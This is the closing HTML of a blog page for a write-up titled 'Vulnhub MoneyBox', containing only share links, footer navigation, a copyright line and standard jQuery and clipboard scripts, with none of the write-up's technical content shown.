  <li><a class="icon" href="mailto:?subject=Vulnhub MoneyBox&body=Check out this article: http://kelpie.top/post/Virtual%20Attack%20[1].html"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&title=Vulnhub MoneyBox"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://kelpie.top/post/Virtual%20Attack%20[1].html&name=Vulnhub MoneyBox&description=&lt;h1 id=&#34;MONEYBOX&#34;&gt;&lt;a href=&#34;#MONEYBOX&#34; class=&#34;headerlink&#34; title=&#34;[MONEYBOX]&#34;&gt;&lt;/a&gt;[MONEYBOX]&lt;/h1&gt;&lt;p&gt;Difficulty: [Medium→Easy]&lt;br&gt;Score: 5.5&amp;#x2F;10&lt;/p&gt;
&lt;hr&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://kelpie.top/post/Virtual%20Attack%20[1].html&t=Vulnhub MoneyBox"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2024
    l3vi4th4n
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/k3lpi3b4nsh33">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
